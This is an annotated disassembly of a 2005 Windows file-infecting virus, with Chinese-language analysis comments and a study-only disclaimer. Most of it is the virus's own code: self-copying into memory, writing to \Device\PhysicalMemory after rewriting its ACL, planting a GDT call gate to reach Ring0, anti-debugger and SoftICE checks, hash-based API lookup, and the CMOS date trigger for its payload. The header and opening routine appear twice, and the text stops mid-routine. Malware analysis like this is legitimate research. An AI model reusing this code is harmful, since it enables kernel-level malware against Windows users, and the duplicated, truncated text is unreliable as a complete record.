;========================================================================
; Created by codez @2005.
; Date: 2005/06/19
; 转载请保留此信息,谢谢!
;========================================================================
; 说明:
; 抱歉,这里的分析并不完整,我会抽空补上。
;
; 欠缺注视部分为 Ring0 代码 (欠缺内容包括:进入Ring0 后的检查部分以及Ring0驻留部分)
; 原因: 这个东西在我的 Win2K Pro SP4 和 WinXP SP2 上面根本不能进入 Ring0,完全模拟分析太费事:(
;
; 一些有用的部分:
; 1. 病毒判断自身是否驻留内存的标志: if (dr0 == 0x474E4159) goto has_in_memory;
; 2. 病毒发作条件:
; mov ax, 1016h
; out 70h, al
; in al, 71h
; xchg ah, al
; out 70h, al
; in al, 71h
;
; xor ax, 926h ; 这个发作条件太苛刻了,几乎没有电脑能够触发它!
; jnz do_not_trigger ; 真不知道为什么瑞星要把它的等级定的那么高!!!
;
;=========================================================================
; 其他:
; 由于 codez 水平有限,分析也比较匆忙 (大概花了两个晚上的时间),另外还有一些东西也是初次接触,
; 如果有任何错误,请发信通知我!不胜感激!
;=========================================================================
; 警告:
; 本文仅供学习研究之用,任何人不得将其用于非法用途,对于任何与之相关所带来的后果均由使用者
; 承担。
;=========================================================================
block2_addr dd 5683Ah ; 45683A 这里指向 block2 (block2 包含破坏代码)
block1_len dd 93Dh
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
public start
start proc near
call $+5
pop ebp
add ebp, 376h ; ebp = 453A3E
lea edi, [ebp-8] ; edi = 453A36
nop
nop
nop
mov ebx, [esp+0] ; Fetch data: dword ptr [esp] -> pointer to Kernel32 hModule
cmp ebx, 80000000h ; Do not run on Win9X system.
ja go_run_host
============================
mov ebx, 77E00000h ; ugly code, but can be work!
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
lea eax, [ebp-143h]
push eax ; seh error handler: 4538FB
xor eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
call Load_apis
push 4
push 1000h
push 17A8h
nop
push 0
call dword ptr [ebp+20h] ; VirtualAlloc
nop
nop
nop
or eax, eax
jz go_run_host
cld
lea esi, [ebp-37Bh] ; esi - 004536C3 (virus start addr)
mov edi, eax
mov edx, ebp
sub edx, [ebp-14Fh] ; edx = 400000 (hModule)
sub esi, edx
loop_move_virus: ; CODE XREF: start+7Ej
add esi, edx
movzx ecx, word ptr [esi-4] ; 93D
push esi
rep movsb ; move virus body to new memory alloced
pop esi
mov esi, [esi-8]
or esi, esi
jnz short loop_move_virus
mov [ebp+0E2h], eax ; [453B20] = hMemAlloced
lea edx, [ebp-57h] ; 004539E7 (unicode: /Device/PhysicalMemory)
nop
nop
nop
lea edi, [ebp-20h] ; [453A1E]
nop
nop
nop
mov [ebp-5Bh], edx ; [4539E3] = edx
nop
nop
nop
and di, 0FFFCh ; 00453A1C
push edi
push 18h
pop ecx
push ecx
xor eax, eax
rep stosb ; clear memory
pop ecx
pop edi
mov esi, edi
mov [edi], eax
mov [esi], ecx ; OBJECT_ATTRIBUTES.Length = 0x18
; OBJECT_ATTRIBUTES.RootDirectory = 0
add edi, 8
lea eax, [edx-8]
mov [edi], eax ; OBJECT_ATTRIBUTES.ObjectName = /Device/PhysicalMemory
mov dword ptr [edi+4], 240h ; OBJECT_ATTRIBUTES.Attributes = 0x240
; other members for OBJECT_ATTRIBUTES are 0
push esi
push 6 ; #define SECTION_MAP_WRITE 0x0002
; #define SECTION_MAP_READ 0x0004
lea edi, [ebp+10h] ; HANDLE - 00453A4E
nop
nop
nop
push edi
;# COPY FROM: WDM.H
;NTSTATUS
; ZwOpenSection(
; OUT PHANDLE SectionHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes
; );
;#COPY FROM: NTDEF.H
;typedef struct _OBJECT_ATTRIBUTES32 {
; ULONG Length;
; ULONG RootDirectory;
; ULONG ObjectName;
; ULONG Attributes;
; ULONG SecurityDescriptor;
; ULONG SecurityQualityOfService;
;} OBJECT_ATTRIBUTES32;
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
or eax, eax
jz ok_USE_GDT_enter_ring0 ; 453A1B
push esi
;=======================================
;#define MEM_PRIVATE 0x20000
;#define MEM_MAPPED 0x40000
;=======================================
push 60000h
push edi
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
push esi
xor ebx, ebx
push ebx
mov eax, esp
push ebx
mov esi, esp
push eax
push ebx
push esi
push ebx
push ebx
push 4
push 6
push dword ptr [edi]
call dword ptr [ebp+52h] ; GetSecurityInfo
nop ; al = 6 ?
nop
nop
push 20h
pop ecx
lea edi, [ebp+12Eh] ; 00453B6C
push edi
xor bl, bl
rep stosb
pop edi
inc bl
mov byte ptr [edi], 2
mov [edi+4], bl
mov [edi+14h], bl
mov [edi+18h], bl
call push_string
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
aYangmin db 'YANGMIN',0
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
push_string: ; CODE XREF: start+118p
pop dword ptr [edi+1Ch]
push ecx
push esp
start endp
push dword ptr [esi]
push edi
push 1
call dword ptr [ebp+5Ah] ; SetEntriesInAclA
nop
nop
nop
xor ebx, ebx
mov eax, [esp]
push ebx
push eax
push ebx
push ebx
push 4
push 6
mov edi, [ebp+10h]
nop
nop
nop
push edi
call dword ptr [ebp+56h] ; SetSecurityInfo
nop
nop
nop
push edi
call dword ptr [ebp+3Eh] ; ZwClose
nop
nop
nop
add esp, 0Ch
push 6
lea edi, [ebp+10h]
nop
nop
nop
push edi
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
or eax, eax
jnz go_run_host
ok_USE_GDT_enter_ring0: ; CODE XREF: start+CEj
lea ecx, [ebp-23h] ; 453A1B
nop
nop
nop
sgdt qword ptr [ecx] ; get gdtr info
inc dword ptr [ecx] ; gdtr limit + 1
movzx edi, word ptr [ecx] ; edi = gdt length
mov ebx, edi
mov edx, [ecx+2] ; edx = gdt base (the value often is 0x80036000)
cmp edx, 80000000h
jb loc_4538D9 ; 453A4E
cmp edx, 0A0000000h
ja short loc_4538D9 ; 453A4E
nop
nop
nop
nop
and edx, 1FFFF000h ; maybe 36000
push edi
push edx
push 0
push 6
push dword ptr [ebp+10h] ; ZwOpenSection HANDLE returned (453A4E)
nop
nop
nop
call dword ptr [ebp+24h] ; MapViewOfFile (453A62)
===================================
NOW! Return value: eax - gdt table
===================================
nop
nop
nop
or eax, eax
jz short loc_4538D9 ; 453A4E
nop
nop
nop
nop
mov ecx, edi
shr ecx, 3 ; gdt_item_max_count = gdt_table_len / 8
dec ecx ; max_index_value
dec ebx
and bl, 0F8h ; last gdt item offset in the gdt table
lea edi, [eax+ebx] ; last gdt item addr in mem
loc_45388B: ; CODE XREF: .text:00453892j
sub edi, 8
test byte ptr [edi+5], 0Fh
loopne loc_45388B
jnz short loc_4538D9 ; 453A4E
==================================
NOW! EDI - is a reserved gdt item
==================================
nop
nop
nop
nop
add edi, 8 ; the next gdt item for using
lea edx, [ebp+5Eh] ; enter Ring0 with GDT way (call to 453A9C)
nop
nop
nop
lea esi, [ebp-2Bh] ; VIRUS APPEND FAKE CALL GATE : 453A13
nop
nop
nop
====================================
FILL OFFSET FOR VIRUS CALL GATE
====================================
mov [esi], dx
shr edx, 10h
mov [esi+6], dx
====================================
push edi
mov ecx, 2
rep movsd ; insert virus fake gate into gdt
pop edi
mov edx, edi
sub edx, eax
or dl, 3 ; selector for call (edi = index<<3+3)
lea eax, [ebp+0Ch] ; 453A4A
nop
nop
nop
mov [eax+4], dx ; [453A4E] = DX
push eax
push 26h
call dword ptr [ebp+28h] ; Sleep (); //453A66
nop
nop
nop
pop eax
call fword ptr [eax] ; enter Ring0 Game
loc_4538D9: ; CODE XREF: .text:0045384Cj
; .text:00453858j .text:00453878j
; .text:00453894j
push dword ptr [ebp+10h] ; 453A4E
nop
nop
nop
call dword ptr [ebp+3Eh] ; ZwClose 453A7C
nop
nop
nop
xor eax, eax
pop dword ptr fs:[eax] ; remove virus seh handler
add esp, 8
go_run_host: ; CODE XREF: start+1Bj start+56j
; .text:0045382Dj Load_apis+Dj
; Load_apis+24j .text:00453950j
; push_call_module_2+8j
sub ebp, 53A3Eh
add ebp, 3F491h ; Original RVA = 3F491 (EPO = 43F491)
push ebp
retn
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
seh_handler2:
call $+5
pop eax
lea eax, [eax-13h]
push eax
mov eax, [esp+10h]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
Load_apis proc near ; CODE XREF: start+3Ap
pusha
pushf
mov eax, [ebp-64h]
nop
nop
nop
cmp eax, 77E60000h
jnz short go_run_host
call dword ptr [ebp+14h] ; IsDebuggerPresent
nop
nop
nop
or eax, eax
jnz short loc_453934 ; jmp is debugger detected!
; clear eax if your debugger was detected!
nop
nop
nop
nop
call check_softice_in_memory
loc_453934: ; CODE XREF: Load_apis+17j
or eax, eax
jnz short go_run_host
popf
popa
call push_module_name ; LoadLibrary
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
aAdvapi32 db 'advapi32',0
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
push_module_name: ; CODE XREF: Load_apis+28p
call dword ptr [ebp+10h] ; LoadLibrary
nop
nop
nop
or eax, eax
Load_apis endp
jz short go_run_host
mov ebx, eax
lea edi, [ebp+42h] ; 453a80
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
call push_call_module_2
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
aNtdll db 'ntdll',0
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
push_call_module_2 proc near ; CODE XREF: .text:0045395Fp
call dword ptr [ebp+10h]
nop
nop
nop
or eax, eax
jz go_run_host
mov ebx, eax
lea edi, [ebp+2Ch]
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
retn
push_call_module_2 endp
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
check_softice_in_memory proc near ; CODE XREF: Load_apis+1Dp
xor eax, eax
push eax
push 80h
push 3
push eax
inc eax
push eax
add eax, 0Bh
push eax
call push_ntice_string
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
a_Ntice db '//./NTICE',0
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
push_ntice_string: ; CODE XREF: check_softice_in_memory+11p
call dword ptr [ebp+18h]
check_softice_in_memory endp
nop
nop
nop
inc eax
jnz short loc_4539BE
nop
nop
nop
nop
dec eax
push eax
call dword ptr [ebp+1Ch] ; CloseHandle
nop
nop
nop
xor eax, eax
retn
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
loc_4539BE: ; CODE XREF: .text:004539ADj
mov eax, 2
retn
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
add [ecx+4Dh], bl
and [ebx+49h], cl
dec esp
dec esp
and [ecx+4Fh], bl
push ebp
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 1 ;
db 0 ;
db 0 ;
db 0 ;
hKernel32 dd 80400000h
db 90h ;
db 2Ch ; ,
db 0 ;
db 2Eh ; .
db 0 ;
db 32h ; 2
db 46h ; F
db 44h ; D
db 0 ;
db 5Ch ; / ; unicode: /Device/PhysicalMemory
db 0 ;
db 44h ; D
db 0 ;
db 65h ; e
db 0 ;
db 76h ; v
db 0 ;
db 69h ; i
db 0 ;
db 63h ; c
db 0 ;
db 65h ; e
db 0 ;
db 5Ch ; /
db 0 ;
db 50h ; P
db 0 ;
db 68h ; h
db 0 ;
db 79h ; y
db 0 ;
db 73h ; s
db 0 ;
db 69h ; i
db 0 ;
db 63h ; c
db 0 ;
db 61h ; a
db 0 ;
db 6Ch ; l
db 0 ;
db 4Dh ; M
db 0 ;
db 65h ; e
db 0 ;
db 6Dh ; m
db 0 ;
db 6Fh ; o
db 0 ;
db 72h ; r
db 0 ;
db 79h ; y
db 0 ;
===================================
VIRUS APPEND FAKE CALL GATE
===================================
dw 46E7h ; OFFSET LOWORD
dw 8 ; SELECTOR
db 0 ; COUNT
db 0ECh ; P:1; DPL:3; DT:0(SYS/GATE); TYPE:C(386 CALL GATE);
dw 44h ; OFFSET HIWORD
==================================
db 0 ;
db 4 ;
db 0 ;
db 60h ; `
db 3 ;
db 80h ; €
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 2Ah ; *
db 46h ; F
db 44h ; D
db 0 ;
db 40h ; @
db 2 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
============================
db 4Bh ; K
db 45h ; E
db 52h ; R
db 4Eh ; N
db 45h ; E
db 4Ch ; L
db 33h ; 3
db 32h ; 2
============================
kernel32_api_hash_code_table
============================
dw 0F3D5h
dw 1336h
dw 8406h
dw 4873h
dw 0C6C7h
dw 66F4h
dw 837Fh
-------------------------
dw 0 ; separator
=============================
KERNEL32.DLL
=============================
addr_LoadLibraryA dd 6C8h ; later, the dword will be used for
; storing HANDLE of ZwOpenSection
addr_IsDebuggerPresent dd 77E6171Dh
addr_CreateFileA dd 77E6B66Dh
addr_CloseHandle dd 77E676F6h
addr_VirtualAlloc dd 77E67F50h
addr_MapViewOfFile dd 77E6D2D7h
addr_Sleep dd 77E675E0h
=========================
db 6Eh ; n
db 74h ; t
db 64h ; d
db 6Ch ; l
db 6Ch ; l
db 2Eh ; .
db 64h ; d
db 6Ch ; l
=======================
dw 0F092h
dw 0BCC8h
dw 0
ZwOpenSection dd 77F86AD5h
ZwClose dd 77F83763h
==============================
db 41h ; A
db 44h ; D
db 56h ; V
db 41h ; A
db 50h ; P
db 49h ; I
db 33h ; 3
db 32h ; 2
==============================
dw 6313h
dw 0DEA4h
dw 39A9h
dw 0
addr_GetSecurityInfo dd 77DC1B02h
addr_SetSecurityInfo dd 77DC1BA3h
addr_SetEntriesInAclA dd 77D92DB6h
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
==============================
VIRUS_RING0_GAME:
pusha
pushf
cli
call $+5
pop ebp ; ebp = 453AA4
lea edi, [ebp+0A8h] ; 453B4C: "ntoskrnl"
xor edx, edx
mov ebx, 80400000h
mov [edi+20h], edx
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
cmp [edi+20h], edx
nop
nop
nop
jz loc_453B49
cld
mov edx, [edi+24h]
nop
nop
nop
mov edx, [edx+1]
mov eax, [edi+20h]
nop
nop
nop
mov eax, [eax]
mov edi, [eax+edx*4]
mov ecx, [ebp+7Ch]
nop
nop
nop
mov [ecx+5EBh], edi
mov byte ptr [ecx+5FFh], 0
mov ecx, dr0
cmp ecx, 474E4159h ; mask in memory?
jz short loc_453B49
nop
nop
nop
nop
lea edi, [eax+edx*4]
push 4D59h
push 30BEh
nop
push 0
call dword ptr [ebp+0D8h] ; maybe alloc a memory
or eax, eax
jz short loc_453B49
nop
nop
nop
nop
push edi
mov esi, 990000h
push esi
mov edi, esi
lea esi, [ebp-3E1h] ; 4536C3
mov ecx, 5EAh
nop
rep movsb
pop esi
mov edi, eax
push 0BD4h
nop
pop ecx
rep movsb
pop edi
add eax, 5EAh
mov [edi], eax
loc_453B49: ; CODE XREF: .text:00453AC3j
; .text:00453AFAj .text:00453B18j
popf
popa
retf
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
db 6Eh ; n ; ntoskrnl
db 74h ; t
db 6Fh ; o
db 73h ; s
db 6Bh ; k
db 72h ; r
db 6Eh ; n
db 6Ch ; l
dw 927Eh
dw 75D8h
dw 0B063h
dw 9B3Ah
dw 0C12Eh
dw 90F8h
dw 5B5Ah
dw 0F72Eh
dw 70EAh
dw 2B7Ah
dw 0BCC8h
dw 0
dd 8046D7A0h
dd 80400A06h
dd 8040120Ah
dd 804016C6h
dd 8046A6C0h
dd 804A81C6h
dd 804554E5h
dd 8042D8A4h
dd 8040141Ah
dd 8040101Ah
dd 80400986h
dd 0
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
seek_module_and_apis proc near ; CODE XREF: start+26p .text:0045395Ap
; push_call_module_2+16p
; .text:00453AB8p
pusha
pushf
call $+5
pop ebp ; EBP = 453BA3
push ebp
lea eax, [ebp+6Ch] ; seh handler for error: 453C0F
nop
nop
nop
push eax
xor ecx, ecx
push dword ptr fs:[ecx]
mov fs:[ecx], esp ; __try
sub ebx, 10000h
loop_to_seek_pe_module: ; CODE XREF: seek_module_and_apis+31j
; seek_module_and_apis+3Dj
; seek_module_and_apis+53j
; seek_module_and_apis+5Bj
add ebx, 10000h ; ebx = 77E00000h
cmp ebx, 80500000h
ja short hKernel32_found_end
cmp word ptr [ebx], 5A4Dh ; MZ
jnz short loop_to_seek_pe_module
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h ; PE
jnz short loop_to_seek_pe_module
;==================================
; out:
; eax - PE header pointer
; ebx - hKernel32 (if correct)
;==================================
mov [ebp-1C9h], ebx ; [4539DA] = hKernel32
mov eax, [eax+78h]
add eax, ebx ; eax - Export table rva
mov edx, [eax+0Ch]
add edx, ebx ; edx = DLL Module Name rva
mov ecx, [edi] ; edi -> KERNEL32
;check pe_file_export_name == 'KERNEL32'?
cmp [edx], ecx
jnz short loop_to_seek_pe_module
mov ecx, [edi+4]
cmp [edx+4], ecx
jnz short loop_to_seek_pe_module
;===============================
; out:
; eax - export table rva
; ebx - hKernel32
;===============================
hKernel32_found_end: ; CODE XREF: seek_module_and_apis+2Aj
xor ecx, ecx
pop dword ptr fs:[ecx]
pop esi
pop esi ; esi = 453BA3
; edi = 453A36
add edi, 8 ; edi = 453A3E
;=======================================
; if hKernel32 found, ebx is hInstance,
; else ebx is NULL.
;=======================================
or ebx, ebx
jz short loc_453C0C
call seek_all_api ; input:
; ecx = 0
; esi = 453BA3
; edi = 453A3E
loc_453C0C: ; CODE XREF: seek_module_and_apis+69j
popf
popa
retn
seek_module_and_apis endp
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
seh_handler:
call $+5
pop eax
lea eax, [eax-5Ah]
push eax
mov eax, [esp+10h]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
; input:
; ecx = 0
; esi = 453BA3
; edi = 453A3E
seek_all_api proc near ; CODE XREF: seek_module_and_apis+6Bp
var_4 = dword ptr -4
cld
dec ecx ; ecx = 0xffffffff
push eax
xor eax, eax
repne scasw
not ecx
dec ecx
push ecx ; length
push edi ; 453A4E
rep stosd ; ZeroMemory
pop edi
sub edi, 4
pop ecx
pop eax
eax - export rva table
mov esi, [eax+20h] ; Export function name directory rva
add esi, ebx
mov esi, [esi]
add esi, ebx
xor edx, edx
push ecx
loc_453C47: ; CODE XREF: seek_all_api+5Aj
push ecx
loc_453C48: ; CODE XREF: seek_all_api+3Bj
cmp edx, [eax+18h]
pop ecx
jz short loc_453C82
push ecx
inc edx
push eax
call creat_hash_code_for_api_name ;
; =================================
; input:
; esi - api name
; output:
; eax - hash code for the api
; =================================
push edi ; edi - 453a4a
std
mov ecx, [esp+10h+var_4]
repne scasw ; only match low word hash code
pop edi
pop eax
jnz short loc_453C48
push edx
dec edx
push edi
mov edi, [eax+24h]
add edi, ebx
movzx edx, word ptr [edi+edx*2]
mov edi, [eax+1Ch]
add edi, ebx
mov edx, [edi+edx*4]
add edx, ebx
pop edi
mov [edi+ecx*4+4], edx
pop edx
pop ecx
loop loc_453C47
loc_453C82: ; CODE XREF: seek_all_api+26j
pop ecx
retn
seek_all_api endp
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;
; =================================
; input:
; esi - api name
; output:
; eax - hash code for the api
; =================================
creat_hash_code_for_api_name proc near ; CODE XREF: seek_all_api+2Bp
push edx
push 0FFFFFFFFh
pop edx
cld
loc_453C89: ; CODE XREF: creat_hash_code_for_api_name+24j
lodsb
or al, al
jz short loc_453CAA
nop
nop
nop
nop
xor dl, al
mov al, 8
loc_453C96: ; CODE XREF: creat_hash_code_for_api_name+22j
shr edx, 1
jnb short loc_453CA4
nop
nop
nop
nop
xor edx, 59414E47h
loc_453CA4: ; CODE XREF: creat_hash_code_for_api_name+14j
dec al
jnz short loc_453C96
jmp short loc_453C89
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
loc_453CAA: ; CODE XREF: creat_hash_code_for_api_name+8j
xchg eax, edx
pop edx
retn
creat_hash_code_for_api_name endp
; Created by codez @2005.
; Date: 2005/06/19
; 转载请保留此信息,谢谢!
;========================================================================
; 说明:
; 抱歉,这里的分析并不完整,我会抽空补上。
;
; 欠缺注视部分为 Ring0 代码 (欠缺内容包括:进入Ring0 后的检查部分以及Ring0驻留部分)
; 原因: 这个东西在我的 Win2K Pro SP4 和 WinXP SP2 上面根本不能进入 Ring0,完全模拟分析太费事:(
;
; 一些有用的部分:
; 1. 病毒判断自身是否驻留内存的标志: if (dr0 == 0x474E4159) goto has_in_memory;
; 2. 病毒发作条件:
; mov ax, 1016h
; out 70h, al
; in al, 71h
; xchg ah, al
; out 70h, al
; in al, 71h
;
; xor ax, 926h ; 这个发作条件太苛刻了,几乎没有电脑能够触发它!
; jnz do_not_trigger ; 真不知道为什么瑞星要把它的等级定的那么高!!!
;
;=========================================================================
; 其他:
; 由于 codez 水平有限,分析也比较匆忙 (大概花了两个晚上的时间),另外还有一些东西也是初次接触,
; 如果有任何错误,请发信通知我!不胜感激!
;=========================================================================
; 警告:
; 本文仅供学习研究之用,任何人不得将其用于非法用途,对于任何与之相关所带来的后果均由使用者
; 承担。
;=========================================================================
block2_addr dd 5683Ah ; 45683A 这里指向 block2 (block2 包含破坏代码)
block1_len dd 93Dh
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
public start
start proc near
call $+5
pop ebp
add ebp, 376h ; ebp = 453A3E
lea edi, [ebp-8] ; edi = 453A36
nop
nop
nop
mov ebx, [esp+0] ; Fetch data: dword ptr [esp] -> pointer to Kernel32 hModule
cmp ebx, 80000000h ; Do not run on Win9X system.
ja go_run_host
============================
mov ebx, 77E00000h ; ugly code, but can be work!
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
lea eax, [ebp-143h]
push eax ; seh error handler: 4538FB
xor eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
call Load_apis
push 4
push 1000h
push 17A8h
nop
push 0
call dword ptr [ebp+20h] ; VirtualAlloc
nop
nop
nop
or eax, eax
jz go_run_host
cld
lea esi, [ebp-37Bh] ; esi - 004536C3 (virus start addr)
mov edi, eax
mov edx, ebp
sub edx, [ebp-14Fh] ; edx = 400000 (hModule)
sub esi, edx
loop_move_virus: ; CODE XREF: start+7Ej
add esi, edx
movzx ecx, word ptr [esi-4] ; 93D
push esi
rep movsb ; move virus body to new memory alloced
pop esi
mov esi, [esi-8]
or esi, esi
jnz short loop_move_virus
mov [ebp+0E2h], eax ; [453B20] = hMemAlloced
lea edx, [ebp-57h] ; 004539E7 (unicode: /Device/PhysicalMemory)
nop
nop
nop
lea edi, [ebp-20h] ; [453A1E]
nop
nop
nop
mov [ebp-5Bh], edx ; [4539E3] = edx
nop
nop
nop
and di, 0FFFCh ; 00453A1C
push edi
push 18h
pop ecx
push ecx
xor eax, eax
rep stosb ; clear memory
pop ecx
pop edi
mov esi, edi
mov [edi], eax
mov [esi], ecx ; OBJECT_ATTRIBUTES.Length = 0x18
; OBJECT_ATTRIBUTES.RootDirectory = 0
add edi, 8
lea eax, [edx-8]
mov [edi], eax ; OBJECT_ATTRIBUTES.ObjectName = /Device/PhysicalMemory
mov dword ptr [edi+4], 240h ; OBJECT_ATTRIBUTES.Attributes = 0x240
; other members for OBJECT_ATTRIBUTES are 0
push esi
push 6 ; #define SECTION_MAP_WRITE 0x0002
; #define SECTION_MAP_READ 0x0004
lea edi, [ebp+10h] ; HANDLE - 00453A4E
nop
nop
nop
push edi
;# COPY FROM: WDM.H
;NTSTATUS
; ZwOpenSection(
; OUT PHANDLE SectionHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes
; );
;#COPY FROM: NTDEF.H
;typedef struct _OBJECT_ATTRIBUTES32 {
; ULONG Length;
; ULONG RootDirectory;
; ULONG ObjectName;
; ULONG Attributes;
; ULONG SecurityDescriptor;
; ULONG SecurityQualityOfService;
;} OBJECT_ATTRIBUTES32;
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
or eax, eax
jz ok_USE_GDT_enter_ring0 ; 453A1B
push esi
;=======================================
;#define MEM_PRIVATE 0x20000
;#define MEM_MAPPED 0x40000
;=======================================
push 60000h
push edi
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
push esi
xor ebx, ebx
push ebx
mov eax, esp
push ebx
mov esi, esp
push eax
push ebx
push esi
push ebx
push ebx
push 4
push 6
push dword ptr [edi]
call dword ptr [ebp+52h] ; GetSecurityInfo
nop ; al = 6 ?
nop
nop
push 20h
pop ecx
lea edi, [ebp+12Eh] ; 00453B6C
push edi
xor bl, bl
rep stosb
pop edi
inc bl
mov byte ptr [edi], 2
mov [edi+4], bl
mov [edi+14h], bl
mov [edi+18h], bl
call push_string
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
aYangmin db 'YANGMIN',0
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
push_string: ; CODE XREF: start+118p
pop dword ptr [edi+1Ch]
push ecx
push esp
start endp
push dword ptr [esi]
push edi
push 1
call dword ptr [ebp+5Ah] ; SetEntriesInAclA
nop
nop
nop
xor ebx, ebx
mov eax, [esp]
push ebx
push eax
push ebx
push ebx
push 4
push 6
mov edi, [ebp+10h]
nop
nop
nop
push edi
call dword ptr [ebp+56h] ; SetSecurityInfo
nop
nop
nop
push edi
call dword ptr [ebp+3Eh] ; ZwClose
nop
nop
nop
add esp, 0Ch
push 6
lea edi, [ebp+10h]
nop
nop
nop
push edi
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
or eax, eax
jnz go_run_host
ok_USE_GDT_enter_ring0: ; CODE XREF: start+CEj
lea ecx, [ebp-23h] ; 453A1B
nop
nop
nop
sgdt qword ptr [ecx] ; get gdtr info
inc dword ptr [ecx] ; gdtr limit + 1
movzx edi, word ptr [ecx] ; edi = gdt length
mov ebx, edi
mov edx, [ecx+2] ; edx = gdt base (the value often is 0x80036000)
cmp edx, 80000000h
jb loc_4538D9 ; 453A4E
cmp edx, 0A0000000h
ja short loc_4538D9 ; 453A4E
nop
nop
nop
nop
and edx, 1FFFF000h ; maybe 36000
push edi
push edx
push 0
push 6
push dword ptr [ebp+10h] ; ZwOpenSection HANDLE returned (453A4E)
nop
nop
nop
call dword ptr [ebp+24h] ; MapViewOfFile (453A62)
===================================
NOW! Return value: eax - gdt table
===================================
nop
nop
nop
or eax, eax
jz short loc_4538D9 ; 453A4E
nop
nop
nop
nop
mov ecx, edi
shr ecx, 3 ; gdt_item_max_count = gdt_table_len / 8
